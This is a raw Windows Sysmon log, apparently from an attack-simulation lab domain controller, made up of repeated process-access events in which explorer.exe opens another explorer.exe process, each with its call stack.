16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236050Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236049Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236048Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236047Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236046Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236045Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236044Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236043Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236042Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236041Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236040Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236039Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236038Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236037Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236036Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236035Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236034Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236033Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236032Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236031Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236030Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236029Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236028Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236027Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236026Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236025Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236024Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236023Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 